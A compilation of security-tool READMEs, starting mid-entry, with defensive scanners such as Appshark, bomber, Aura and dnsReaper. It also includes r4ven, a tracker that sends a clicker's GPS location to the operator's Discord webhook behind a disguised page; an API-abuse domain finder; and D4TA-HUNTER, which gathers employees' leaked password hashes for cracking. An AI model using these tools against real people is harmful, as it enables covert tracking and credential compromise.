browsers that block javascript, # or if the user is mocking the GPS location. " dir="auto">
- It will not work on laptops or phones that have broken GPS, 
# browsers that block javascript,
# or if the user is mocking the GPS location.

IP location vs GPS location

- Geographic location based on IP address is NOT accurate,
# Does not provide the location of the target.
# Instead, it provides the approximate location of the ISP (Internet service provider)
longitude and latitude coordinates. @@ Once location permission is granted @@ # accurate location information is recieved to within 20 to 30 meters of the user's location. # (it's almost exact location)" dir="auto">
+ GPS fetch almost exact location because it uses longitude and latitude coordinates.
@@ Once location permission is granted @@
# accurate location information is recieved to within 20 to 30 meters of the user's location.
# (it's almost exact location)

Installation

git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py

enter your discord webhook url (set up a channel in your discord server with webhook integration)

https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

if not have discord account and sever make one, it's free.

https://discord.com/


Track info data will be sent to your discord webhook channel.
  • why discord webhook? Conveniently, you will receive a notification when someone clicks on the link.

To chnage website template

  • open file index.html on line 12 and replace the src in the iframe. (Note: not every website support iframe)


To port forward install ngrok or use ssh

  • For ngrok port forward type: ngrok http 8000
  • For ssh port forwarding type: ssh -R 80:localhost:8000 ssh.localhost.run

Snapshots



DomainDouche - OSINT Tool to Abuse SecurityTrails Domain Suggestion API To Find Potentially Related Domains By Keyword And Brute Force


Abusing SecurityTrails domain suggestion API to find potentially related domains by keyword and brute force.

Use it while it still works


(Also, hmu on Mastodon: @n0kovo@infosec.exchange)


Usage:

usage: domaindouche.py [-h] [-n N] -c COOKIE -a USER_AGENT [-w NUM] [-o OUTFILE] keyword

Abuses SecurityTrails API to find related domains by keyword.
Go to https://securitytrails.com/dns-trails, solve any CAPTCHA you might encounter,
copy the raw value of your Cookie and User-Agent headers and use them with the -c and -a arguments.

positional arguments:
keyword keyword to append brute force string to

options:
-h, --help show this help message and exit
-n N, --num N number of characters to brute force (default: 2)
-c COOKIE, --cookie COOKIE
raw cookie string
-a USER_AGENT, --useragent USER_AGENT
user-agent string (must match the browser where the cookies are from)
-w NUM, --workers NUM
number of workers (default: 5)
-o OUTFILE, --output OUTFILE
output file path


D4TA-HUNTER - GUI Osint Framework With Kali Linux


D4TA-HUNTER is a tool created in order to automate the collection of information about the employees of a company that is going to be audited for ethical hacking.

In addition, in this tool we can find in the "search company" section by inserting the domain of a company, emails of employees, subdomains and IP's of servers.


GET API KEY

Register on https://rapidapi.com/rohan-patra/api/breachdirectory

Install

git clone https://github.com/micro-joan/D4TA-HUNTER
cd D4TA-HUNTER/
chmod +x run.sh
./run.sh

After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:



Use

First you must have a free or paid api-key from BreachDirectory.org, if you don't have one and do a search D4TA-HUNTER provides you with a guide on how to get one.

Once you have the api-key you will be able to search for emails, with the advantage of showing you a list of all the password hashes ready for you to copy and paste into one of the online resources provided by D4TA-HUNTER to crack passwords 100 % free.


Β 

You can also insert a domain of a company and D4TA-HUNTER will search for employee emails, subdomains that may be of interest together with IP's of machines found:


Β 

Apis and tools

Service Functions Status
BreachDirectory.org Email, phone or nick leaks
βœ…
ο”‘
(free plan)
TheHarvester Domains and emails of company
βœ…
Free
Kalitorify Tor search
βœ…
Free


Video Demo:Β https://darkhacking.es/d4ta-hunter-framework-osint-para-kali-linux
My website:Β https://microjoan.com
My blog:Β https://darkhacking.es/
Buy me a coffee:Β https://www.buymeacoffee.com/microjoan

DISCLAIMER

ThisΒ toolkitΒ contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!




Appshark - Static Taint Analysis Platform To Scan Vulnerabilities In An Android App


Appshark is a static taint analysis platform to scan vulnerabilities in an Android app.

Prerequisites

Appshark requires a specific version of JDK -- JDK 11. After testing, it does not work on other LTS versions, JDK 8 and JDK 16, due to the dependency compatibility issue.


Building/Compiling AppShark

We assume that you are working in the root directory of the project repo. You can build the whole project with the gradle tool.

$ ./gradlew build  -x test 

After executing the above command, you will see an artifact file AppShark-0.1.1-all.jar in the directory build/libs.

Running AppShark

Like the previous step, we assume that you are still in the root folder of the project. You can run the tool with

$ java -jar build/libs/AppShark-0.1.1-all.jar  config/config.json5

The config.json5 has the following configuration contents.

{
"apkPath": "/Users/apks/app1.apk",
"out": "out",
"rules": "unZipSlip.json",
"maxPointerAnalyzeTime": 600
}

Each JSON field is explained below.

  • apkPath: the path of the apk file to analyze
  • out: the path of the output directory
  • rules: the path(s) of the rule file(s), can be more than 1 rules
  • maxPointerAnalyzeTime: the timeout duration in seconds set for the analysis started from an entry point
  • debugRule: specify the rule name that enables logging for debugging

If you provide a configuration JSON file which sets the output path as out in the project root directory, you will find the result file out/results.json after running the analysis.

Interpreting the Results

Below is an example of the results.json.

{
"AppInfo": {
"AppName": "test",
"PackageName": "net.bytedance.security.app",
"min_sdk": 17,
"target_sdk": 28,
"versionCode": 1000,
"versionName": "1.0.0"
},
"SecurityInfo": {
"FileRisk": {
"unZipSlip": {
"category": "FileRisk",
"detail": "",
"model": "2",
"name": "unZipSlip",
"possibility": "4",
"vulners": [
{
"details": {
"position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>",
"Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31",
"entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
"Source": "<net.byte dance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
"url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/1-unZipSlip.html",
"target": [
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
"pf{obj{<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>:35=>java.lang.StringBuilder}(unknown)->@data}",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r11",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31"
]
},
"hash": "ec57a2a3190677ffe78a0c8aaf58ba5aee4d 2247",
"possibility": "4"
},
{
"details": {
"position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>",
"Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34",
"entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
"Source": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
"url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/2-unZipSlip.html",
"target": [
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
"pf{obj{<net.bytedance.security.a pp.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>:33=>java.lang.StringBuilder}(unknown)->@data}",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r14",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34"
]
},
"hash": "26c6d6ee704c59949cfef78350a1d9aef04c29ad",
"possibility": "4"
}
],
"wiki": "",
"deobfApk": "/Volumes/dev/zijie/appshark-opensource/app.apk"
}
}
},
"DeepLinkInfo": {
},
"HTTP_API": [
],
"JsBridgeInfo": [
],
"BasicInfo": {
"ComponentsInfo": {
},
"JSNativeInterface": [
]
},
"UsePermissions": [
],
"DefinePermis sions": {
},
"Profile": "/Volumes/dev/zijie/appshark-opensource/out/vuln/3-profiler.json"
}


Bomber - Scans Software Bill Of Materials (SBOMs) For Security Vulnerabilities


bomber is an application that scans SBOMs for security vulnerabilities.

Overview

So you've asked a vendor for an Software Bill of Materials (SBOM) for one of their closed source products, and they provided one to you in a JSON file... now what?

The first thing you're going to want to do is see if any of the components listed inside the SBOM have security vulnerabilities, and what kind of licenses these components have. This will help you identify what kind of risk you will be taking on by using the product. Finding security vulnerabilities and license information for components identified in an SBOM is exactly what bomber is meant to do. bomber can read any JSON or XML based CycloneDX format, or a JSON SPDX or Syft formatted SBOM, and tell you pretty quickly if there are any vulnerabilities.


What SBOM formats are supported?

There are quite a few SBOM formats available today. bomber supports the following:

Providers

bomber supports multiple sources for vulnerability information. We call these providers. Currently, bomber uses OSV as the default provider, but you can also use the Sonatype OSS Index.

Please note that each provider supports different ecosystems, so if you're not seeing any vulnerabilities in one, try another. It is also important to understand that each provider may report different vulnerabilities. If in doubt, look at a few of them.

If bomber does not find any vulnerabilities, it doesn't mean that there aren't any. All it means is that the provider being used didn't detect any, or it doesn't support the ecosystem. Some providers have vulnerabilities that come back with no Severity information. In this case, the Severity will be listed as "UNDEFINED"

What is an ecosystem?

An ecosystem is simply the package manager, or type of package. Examples include rpm, npm, gems, etc. Each provider supports different ecosystems.

OSV

OSV is the default provider for bomber. It is an open, precise, and distributed approach to producing and consuming vulnerability information for open source.

You don't need to register for any service, get a password, or a token. Just use bomber without a provider flag and away you go like this:

bomber scan test.cyclonedx.json

Supported ecosystems

At this time, the OSV supports the following ecosystems:

  • Android
  • crates.io
  • Debian
  • Go
  • Maven
  • NPM
  • NuGet
  • Packagist
  • PyPI
  • RubyGems

and others...

OSV Notes

The OSV provider is pretty slow right now when processing large SBOMs. At the time of this writing, their batch endpoint is not functioning, so bomber needs to call their API one package at a time.

Additionally, there are cases where OSV does not return a Severity, or a CVE/CWE. In these rare cases, bomber will output "UNSPECIFIED", and "UNDEFINED" respectively.

Sonatype OSS Index

In order to use bomber with the Sonatype OSS Index you need to get an account. Head over to the site, and create a free account, and make note of your username (this will be the email that you registered with).

Once you log in, you'll want to navigate to your settings and make note of your API token. Please don't share your token with anyone.

Supported ecosystems

At this time, the Sonatype OSS Index supports the following ecosystems:

  • Maven
  • NPM
  • Go
  • PyPi
  • Nuget
  • RubyGems
  • Cargo
  • CocoaPods
  • Composer
  • Conan
  • Conda
  • CRAN
  • RPM
  • Swift

Installation

Mac

You can use Homebrew to install bomber using the following:

brew tap devops-kung-fu/homebrew-tap
brew install devops-kung-fu/homebrew-tap/bomber

If you do not have Homebrew, you can still download the latest release (ex: bomber_0.1.0_darwin_all.tar.gz), extract the files from the archive, and use the bomber binary.

If you wish, you can move the bomber binary to your /usr/local/bin directory or anywhere on your path.

Linux

To install bomber, download the latest release for your platform and install locally. For example, install bomber on Ubuntu:

dpkg -i bomber_0.1.0_linux_arm64.deb

Using bomber

You can scan either an entire folder of SBOMs or an individual SBOM with bomber. bomber doesn't care if you have multiple formats in a single folder. It'll sort everything out for you.

Note that the default output for bomber is to STDOUT. Options to output in HTML or JSON are described later in this document.

Single SBOM scan

credentials (ossindex) bomber scan --provider=xxx --username=xxx --token=xxx spdx-sbom.json" dir="auto">
# Using OSV (the default provider) which does not require any credentials
bomber scan spdx.sbom.json

# Using a provider that requires credentials (ossindex)
bomber scan --provider=xxx --username=xxx --token=xxx spdx-sbom.json

If the provider finds vulnerabilities you'll see an output similar to the following:

If the provider doesn't return any vulnerabilities you'll see something like the following:

Entire folder scan

This is good for when you receive multiple SBOMs from a vendor for the same product. Or, maybe you want to find out what vulnerabilities you have in your entire organization. A folder scan will find all components, de-duplicate them, and then scan them for vulnerabilities.

# scan a folder of SBOMs (the following command will scan a folder in your current folder named "sboms")
bomber scan --username=xxx --token=xxx ./sboms

You'll see a similar result to what a Single SBOM scan will provide.

Output to HTML

If you would like a readable report generated with detailed vulnerability information, you can utilized the --output flag to save a report to an HTML file.

Example command:

bomber scan bad-bom.json --output=html

This will save a file in your current folder in the format "YYYY-MM-DD-HH-MM-SS-bomber-results.html". If you open this file in a web browser, you'll see output like the following:

Output to JSON

bomber can output vulnerability data in JSON format using the --output flag. The default output is to STDOUT. There is a ton of more information in the JSON output than what gets displayed in the terminal. You'll be able to see a package description and what it's purpose is, what the vulnerability name is, a summary of the vulnerability, and more.

Example command:

bomber scan bad-bom.json --output=json

Advanced stuff

If you wish, you can set two environment variables to store your credentials, and not have to type them on the command line. Check out the Environment Variables information later in this README.

Environment Variables

If you don't want to enter credentials all the time, you can add the following to your .bashrc or .bash_profile

export BOMBER_PROVIDER_USERNAME={{your OSS Index user name}}
export BOMBER_PROVIDER_TOKEN={{your OSS Index API Token}}

Messing around

If you want to kick the tires on bomber you'll find a selection of test SBOMs in the test folder.

Notes

  • It's pretty rare to see SBOMs with license information. Most of the time, the generators like Syft need a flag like --license. If you need license info, make sure you ask for it with the SBOM.
  • Hate to say it, but SPDX is wonky. If you don't get any results on an SPDX file, try using a CycloneDX file. In general you should always try to get CycloneDX SBOMs from your vendors.
  • OSV. It's great, but the API is also wonky. They have a batch endpoint that would make it a ton quicker to get information back, but it doesn't work. bomber needs to send one PURL at a time to get vulnerabilities back, so in a big SBOM it will take some time. We'll keep an eye on that.
  • OSV has another issue where the ecosystem doesn't always return vulnerabilities when you pass it to their API. We had to remove passing this to the API to get anything to return. They also don't echo back the ecosystem so we can't check to ensure that if we pass one ecosystem to it, that we are getting a vulnerability for the same one back.

Contributing

If you would like to contribute to the development of bomber please refer to the CONTRIBUTING.md file in this repository. Please read the CODE_OF_CONDUCT.md file before contributing.

Software Bill of Materials

bomber uses Syft to generate a Software Bill of Materials every time a developer commits code to this repository (as long as Hookzis being used and is has been initialized in the working directory). More information for CycloneDX is available here.

The current CycloneDX SBOM for bomber is available here.

Credits

A big thank-you to our friends at Smashicons for the bomber logo.

Big kudos to our OSS homies at Sonatype for providing a wicked tool like the Sonatype OSS Index.



Aura - Python Source Code Auditing And Static Analysis On A Large Scale

Source code auditing and static code analysis

Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Project goals:

  • provide an automated monitoring system over uploaded packages to PyPI, alert on anomalies that can either indicate an ongoing attack or vulnerabilities in the code
  • enable an organization to conduct automated security audits of the source code and implement secure coding practices with a focus on auditing 3rd party code such as python package dependencies
  • allow researches to scan code repositories on a large scale, create datasets and perform analysis to further advance research in the area of vulnerable and malicious code dependencies

Feature list:

  • Suitable for analyzing malware with a guarantee of a zero-code execution
  • Advanced deobfuscation mechanisms by rewriting the AST tree - constant propagations, code unrolling, and other dirty tricks
  • Recursive scanning automatically unpacks archives such as zips, wheels, etc.. and scans the content
  • Support scanning also non-python files - plugins can work in a β€œraw-file” mode such as the built-in Yara integration
  • Scan for hardcoded secrets, passwords, and other sensitive information
  • Custom diff engine - you can compare changes between different data sources such as typosquatting PyPI packages to what changes were made
  • Works for both Python 2.x and Python 3.x source code
  • High performance, designed to scan the whole PyPI repository
  • Output in numerous formats such as pretty plain text, JSON, SQLite, SARIF, etc…
  • Tested on over 4TB of compressed python source code
  • Aura is able to report on code behavior such as network communication, file access, or system command execution
  • Compute the β€œAura score” telling you how trustworthy the source code/input data is
  • and much much more…

Didn't find what you are looking for? Aura's architecture is based on a robust plugin system, where you can customize almost anything, ranging from a set of data analyzers, transport protocols to custom out formats.


Installation

# Via pip:
pip install aura-security[full]
# or build from source/git
poetry install --no-dev -E full

Or just use a prebuild docker image sourcecodeai/aura:dev

Running Aura

docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v

Aura uses a so-called URIs to identify the protocol and location to scan, if no protocol is used, the scan argument is treated as a path to the file or directory on a local system.

Diff packages:

docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2

Find most popular typosquatted packages (you need to call aura update to download the dataset first):

aura find-typosquatting --max-distance 2 --limit 10
Python source code auditing and static analysis on a large scale (10)

Why Aura?

While there are other tools with functionality that overlaps with Aura such as Bandit, dlint, semgrep etc. the focus of these alternatives is different which impacts the functionality and how they are being used. These alternatives are mainly intended to be used in a similar way to linters, integrated into IDEs, frequently run during the development which makes it important to minimize false positives and reporting with clear actionable explanations in ideal cases.

Aura on the other hand reports on ** behavior of the code**, anomalies, and vulnerabilities with as much information as possible at the cost of false positive. There are a lot of things reported by aura that are not necessarily actionable by a user but they tell you a lot about the behavior of the code such as doing network communication, accessing sensitive files, or using mechanisms associated with obfuscation indicating a possible malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems such as antivirus, IDS, or firewalls that are essentially doing the same analysis but on a different kind of data (network communication, running processes, etc).

Here is a quick overview of differences between Aura and other similar linters and SAST tools:

  • input data:
    • Other SAST tools - usually restricted to only python (target) source code and python version under which the tool is installed.
    • Aura can analyze both binary (or non-python code) and python source code as well. Able to analyze a mixture of python code compatible with different python versions (py2k & py3k) using the same Aura installation.
  • reporting:
    • Other SAST tools - Aims at integrating well with other systems such as IDEs, CI systems with actionable results while trying to minimize false positives to prevent overwhelming users with too many non-significant alerts.
    • Aura - reports as much information as possible that is not immediately actionable such as behavioral and anomaly analysis. The output format is designed for easy machine processing and aggregation rather than human readable.
  • configuration:
    • Other SAST tools - The tools are fine-tuned to the target project by customizing the signatures to target specific technologies used by the target project. The overriding configuration is often possible by inserting comments inside the source code such as # nosec that will suppress the alert at that position
    • Aura - it is expected that there is little to no knowledge in advance about the technologies used by code that is being scanned such as auditing a new python package for approval to be used as a dependency in a project. In most cases, it is not even possible to modify the scanned source code such as using comments to indicate to linter or aura to skip detection at that location because it is scanning a copy of that code that is hosted at some remote location.

Authors & Contributors

Donate

LICENSE

Aura framework is licensed under the GPL-3.0. Datasets produced from global scans using Aura are released under the CC BY-NC 4.0 license. Use the following citation when using Aura or data produced by Aura in research:

@misc{Carnogursky2019thesis,
AUTHOR = "CARNOGURSKY, Martin",
TITLE = "Attacks on package managers [online]",
YEAR = "2019 [cit. 2020-11-02]",
TYPE = "Bachelor Thesis",
SCHOOL = "Masaryk University, Faculty of Informatics, Brno",
SUPERVISOR = "Vit Bukac",
URL = "Available at WWW <https://is.muni.cz/th/y41ft/>",
}


dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!


DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

We can scan around 50 subdomains per second, testing each one with over 50 takeover signatures. This means most organisations can scan their entire DNS estate in less than 10 seconds.


You can use DNS Reaper as an attacker or bug hunter!

You can run it by providing a list of domains in a file, or a single domain on the command line. DNS Reaper will then scan the domains with all of its signatures, producing a CSV file.

You can use DNS Reaper as a defender!

You can run it by letting it fetch your DNS records for you! Yes that's right, you can run it with credentials and test all your domain config quickly and easily. DNS Reaper will connect to the DNS provider and fetch all your records, and then test them.

We currently support AWS Route53, Cloudflare, and Azure. Documentation on adding your own provider can be found here

You can use DNS Reaper as a DevSecOps Pro!

Punk Security are a DevSecOps company, and DNS Reaper has its roots in modern security best practice.

You can run DNS Reaper in a pipeline, feeding it a list of domains that you intend to provision, and it will exit Non-Zero if it detects a takeover is possible. You can prevent takeovers before they are even possible!

Usage

To run DNS Reaper, you can use the docker image or run it with python 3.10.

Findings are returned in the output and more detail is provided in a local "results.csv" file. We also support json output as an option.

Run it with docker

docker run punksecurity/dnsreaper --help

Run it with python

pip install -r requirements.txt
python main.py --help

Common commands

  • Scan AWS account:

    docker run punksecurity/dnsreaper aws --aws-access-key-id <key> --aws-access-key-secret <secret>

    For more information, see the documentation for the aws provider

  • Scan all domains from file:

    docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/<filename>

  • Scan single domain

    docker run punksecurity/dnsreaper single --domain <domain>

  • Scan single domain and output to stdout:

    You should either redirect the stderr output or save stdout output with >

    docker run punksecurity/dnsreaper single --domain <domain> --out stdout --out-format=json > output

Full usage

          ____              __   _____                      _ __
/ __ \__ ______ / /__/ ___/___ _______ _______(_) /___ __
/ /_/ / / / / __ \/ //_/\__ \/ _ \/ ___/ / / / ___/ / __/ / / /
/ ____/ /_/ / / / / ,< ___/ / __/ /__/ /_/ / / / / /_/ /_/ /
/_/ \__,_/_/ /_/_/|_|/____/\___/\___/\__,_/_/ /_/\__/\__, /
PRESENTS /____/
DNS Reaper ☠️

Scan all your DNS records for subdomain takeovers!

usage:
.\main.py provider [options]

output:
findings output to screen and (by default) results.csv

help:
.\main.py --help

providers:
> aws - Scan multiple domains by fetching them from AWS Route53
> azure - Scan multiple domains by fetching t hem from Azure DNS services
> bind - Read domains from a dns BIND zone file, or path to multiple
> cloudflare - Scan multiple domains by fetching them from Cloudflare
> file - Read domains from a file, one per line
> single - Scan a single domain by providing a domain on the commandline
> zonetransfer - Scan multiple domains by fetching records via DNS zone transfer

positional arguments:
{aws,azure,bind,cloudflare,file,single,zonetransfer}

options:
-h, --help Show this help message and exit
--out OUT Output file (default: results) - use 'stdout' to stream out
--out-format {csv,json}
--resolver RESOLVER
Provide a custom DNS resolver (or multiple seperated by commas)
--parallelism PARALLELISM
Number of domains to test in parallel - too high and you may see odd DNS results (default: 30)
--disable-probable Do not check for probable conditions
--enable-unlikely Check for more conditions, but with a high false positive rate
--signature SIGNATURE
Only scan with this signature (multiple accepted)
--exclude-signature EXCLUDE_SIGNATURE
Do not scan with this signature (multiple accepted)
--pipeline Exit Non-Zero on detection (used to fail a pipeline)
-v, --verbose -v for verbose, -vv for extra verbose
--nocolour Turns off coloured text

aws:
Scan multiple domains by fetching them from AWS Route53

--aws-access-key-id AWS_ACCESS_KEY_ID
Optional
--aws-access-key-secret AWS_ACCESS_KEY_SECRET
Optional

azure:
Scan multiple domains by fetching them from Azure DNS services

--az-subscription-id AZ_SUBSCRIPTION_ID
Required
--az-tenant-id AZ_TENANT_ID
Required
--az-client-id AZ_CLIENT_ID
Required
--az-client-secret AZ_CLIENT_SECRET
Required

bind:
Read domains from a dns BIND zone file, or path to multiple

--bind-zone-file BIND_ZONE_FILE
Required

cloudflare:
Scan multiple domains by fetching them from Cloudflare

--cloudflare-token CLOUDFLARE_TOKEN
Required

file:
Read domains from a file, one per line

--filename FILENAME Required

single:
Scan a single domain by providing a domain on the commandline

--domain DOMAIN Required

zonetransfer:
Scan multiple domains by fetching records via DNS zone transfer

--zonetransfer-nameserver ZONE TRANSFER_NAMESERVER
Required
--zonetransfer-domain ZONETRANSFER_DOMAIN
Required


❌